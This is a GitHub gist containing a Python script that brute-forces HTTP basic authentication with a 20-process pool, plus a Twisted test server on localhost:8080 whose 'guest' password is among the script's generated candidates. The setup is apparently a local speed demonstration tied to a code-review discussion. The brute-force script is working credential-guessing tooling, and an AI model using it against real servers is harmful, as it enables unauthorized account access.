-
-
Save zed/0a8860f4f9a824561b51 to your computer and use it in GitHub Desktop.
Brute force basic http authorization using httplib and multiprocessing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
"""Brute force basic http auth. | |
See http://codereview.stackexchange.com/questions/12659/brute-force-http-with-python | |
""" | |
from __future__ import print_function | |
import sys | |
import time | |
from base64 import b64encode | |
from itertools import repeat | |
from multiprocessing import Pool | |
from string import digits | |
from timeit import default_timer as timer | |
try: | |
from httplib import HTTPConnection | |
except ImportError: | |
from http.client import HTTPConnection # py3k | |
try: | |
from itertools import izip as zip | |
except ImportError: # py3k | |
zip = zip | |
def gen_passwords(): # ~400K/s | |
for a in "aA"+digits: | |
S = "sS$"+digits | |
for s1 in S: | |
for s2 in S: | |
for o in u"oO0$_癙": | |
yield u"p{a}{s1}{s2}w{o}rd".format(**locals()) | |
def report_error(*args):
    """Write one ``error (...)`` line describing *args* to stderr.

    All positional arguments are shown together as a single tuple.
    """
    message = "error %s" % (args,)
    print(message, file=sys.stderr)
conn = None  # per-process HTTPConnection, created lazily by check()


def _new_connection():
    """Create the HTTPConnection to localhost:8080 used by check()."""
    try:
        return HTTPConnection('localhost', 8080, strict=True)
    except TypeError:
        # Python 3.4+ removed the ``strict`` argument; without this fallback
        # every call would fail there with "unexpected keyword argument".
        return HTTPConnection('localhost', 8080)


def check(user, password, nretries=0):  # ~1100/s
    """Try one user/password pair against the server with HTTP basic auth.

    Sends ``GET /`` with an ``Authorization: Basic`` header over the
    module-level connection, creating that connection on first use.

    Args:
        user: user name (text).
        password: candidate password (text).
        nretries: how many times to retry after a status other than
            200 or 401.  Before each retry the call sleeps
            ``5 / nretries**2`` seconds, using the remaining retry count.

    Returns:
        ``(user, password)`` when the server answers 200; ``None`` when it
        answers 401, or when another status persists after all retries
        (in which case the status is reported via report_error()).
    """
    global conn  # use 1 connection per process
    if conn is None:
        conn = _new_connection()
    credentials = (user + ':' + password).encode('utf-8')  # see rfc5987
    headers = {'Authorization': b'Basic ' + b64encode(credentials)}
    while True:
        conn.request('GET', '/', headers=headers)
        r = conn.getresponse()
        r.read()  # should read before sending the next request
        if r.status == 401:
            return None
        if r.status == 200:
            return (user, password)
        if nretries <= 0:
            report_error((user, password), r.status)
            return None
        time.sleep(5. / nretries**2)  # retry
        nretries -= 1
def mp_check(args):
    """Run ``check(*args)`` and turn ordinary failures into a ``None`` result.

    Intended as the callable handed to the worker pool: *args* is the
    argument tuple for check().  If check() raises an ``Exception``, the
    error and its traceback are written to stderr, the module-level
    connection is closed and reset so the next call opens a fresh one, and
    ``None`` is returned.

    Returns:
        Whatever check() returns, or ``None`` after a reported failure.
    """
    global conn
    try:
        return check(*args)
    except Exception as e:
        report_error(args, e)
        import traceback
        traceback.print_exc(file=sys.stderr)
        if conn is not None:  # may still be None if creating it failed
            try:
                conn.close()  # prevent fd leaks
            except Exception as close_error:
                # Closing is best effort, but do not hide the failure and
                # do not swallow KeyboardInterrupt/SystemExit.
                report_error(args, close_error)
        conn = None  # reset connection
        return None
def main():
    """Brute force the password of user ``guest`` with a pool of 20 workers.

    Feeds every candidate from gen_passwords() to mp_check() through
    ``imap_unordered`` and stops at the first truthy result.  The match (if
    any) and the throughput are printed to stdout.
    """
    user = u"guest"
    start = timer()
    pool = Pool(processes=20)
    n = 0  # stays 0 if there are no candidates at all
    try:
        args = zip(repeat(user), gen_passwords())
        for n, found in enumerate(pool.imap_unordered(mp_check, args), 1):
            if found:
                print("found %s" % (found,))
                break
        t = timer() - start
    finally:
        # Stop workers that are still busy with already-queued candidates
        # (after a hit or an error) and wait for them to exit.
        pool.terminate()
        pool.join()
    rate = n / t if t > 0 else 0.0  # avoid ZeroDivisionError on a zero reading
    print("Processed %d passwords in %.2f seconds (%.0f p/s)" % (n, t, rate))


if __name__ == "__main__":
    main()
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
"""A password-protected per-user Twisted Web Server (rpy script) | |
see http://jcalderone.livejournal.com/53074.html | |
Install: | |
$ pip install twisted | |
Run: | |
$ twistd -n web --port="interface=localhost:tcp:8080" --resource-script=http-auth-server.py | |
Visit http://localhost:8080/ | |
""" | |
# rpy magic to use the same CredentialFactory for multiple requests.
# NOTE(review): `cache` is neither imported nor defined in this file;
# presumably the twistd resource-script loader injects it into the script's
# namespace -- confirm against the Twisted version in use.
cache()
from twisted.cred import checkers, portal as portals
from twisted.web import guard, static, resource as resources
from zope.interface import implementer, implements
class Resource(resources.Resource):
    """Web resource that remembers the user it was created for."""

    def __init__(self, user):
        """Initialise the base resource and store *user*."""
        resources.Resource.__init__(self)
        self.user = user

    def getChild(self, path, request):
        """Return a plain-text resource that names the user and *path*."""
        body = "user %r path %r" % (self.user, path)
        return static.Data(body, "text/plain")
# The class decorator replaces the ``implements()`` class advice, which is
# deprecated and raises TypeError on Python 3.
@implementer(portals.IRealm)
class Realm(object):
    """Realm that hands out a per-user web Resource as the avatar."""

    def requestAvatar(self, avatarId, mind, *interfaces):
        """Return an avatar for *avatarId* if a web resource was requested.

        Returns:
            The tuple ``(resources.IResource, Resource(avatarId), logout)``
            where ``logout`` is a no-op callable.

        Raises:
            NotImplementedError: if ``resources.IResource`` is not among
                *interfaces*.
        """
        if resources.IResource in interfaces:
            return (resources.IResource, Resource(avatarId), lambda: None)
        raise NotImplementedError()
# In-memory credential store with two accounts: "guest" and "ascii".
# NOTE(review): the non-ASCII character inside the b'...' literal is only
# accepted by Python 2 (Python 3 bytes literals must be ASCII); the stored
# bytes then depend on the source encoding declared at the top of the file.
checker = checkers.InMemoryUsernamePasswordDatabaseDontUse(guest=b'p4$Sw癙rd',
                                                           ascii=b'abc')
# The portal ties the Realm (which builds avatars) to the checker above.
portal = portals.Portal(Realm(), [checker])
# HTTP basic authentication with the realm label "Test server".
credFactory = guard.BasicCredentialFactory("Test server")
# Presumably `resource` is the name the rpy loader looks up and serves --
# confirm against the Twisted documentation.
resource = guard.HTTPAuthSessionWrapper(portal, [credFactory])
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment